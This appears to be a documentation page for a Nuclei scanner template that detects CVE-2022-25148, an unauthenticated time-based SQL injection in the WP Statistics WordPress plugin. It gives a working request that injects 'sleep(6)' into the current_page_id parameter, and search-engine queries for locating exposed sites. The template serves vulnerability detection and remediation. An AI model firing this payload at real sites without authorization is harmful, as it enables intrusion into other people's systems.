WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
ID: CVE-2022-25148
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs
Description
Section titled “Description”The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
YAML Source
Section titled “YAML Source”id: CVE-2022-25148
info: name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection author: theamanrawat severity: critical description: | The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5. remediation: Update wp-statistics plugin to version 13.1.6, or newer. reference: - https://wordpress.org/plugins/wp-statistics/ - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042 - https://nvd.nist.gov/vuln/detail/CVE-2022-25148 - http://packetstormsecurity.com/files/174482/WordPress-WP-Statistics-13.1.5-SQL-Injection.html - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2679983%40wp-statistics&new=2679983%40wp-statistics&sfp_email=&sfph_mail= classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25148 cwe-id: CWE-89 epss-score: 0.10089 epss-percentile: 0.94364 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: veronalabs product: wp_statistics framework: wordpress shodan-query: http.html:/wp-content/plugins/wp-statistics/ fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: /wp-content/plugins/wp-statistics/ google-query: inurl:/wp-content/plugins/wp-statistics tags: time-based-sqli,cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | @timeout: 15s GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1 Host: {{Hostname}}
host-redirects: true matchers: - type: dsl dsl: - duration>=6 - status_code == 200 - contains(header, "application/json") - contains(body, 'Visitor Hit was recorded successfully') condition: and
extractors: - type: regex name: nonce group: 1 regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true# digest: 4b0a00483046022100e0d6d4519a9a68bb4b4c44a0113d1d769d424d4bd235cb4673370924765d7595022100d53783cab9470d1cb7a6ceab3f3eaf1e147de5d791dc4b325a1084c79ad44520:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-25148.yaml"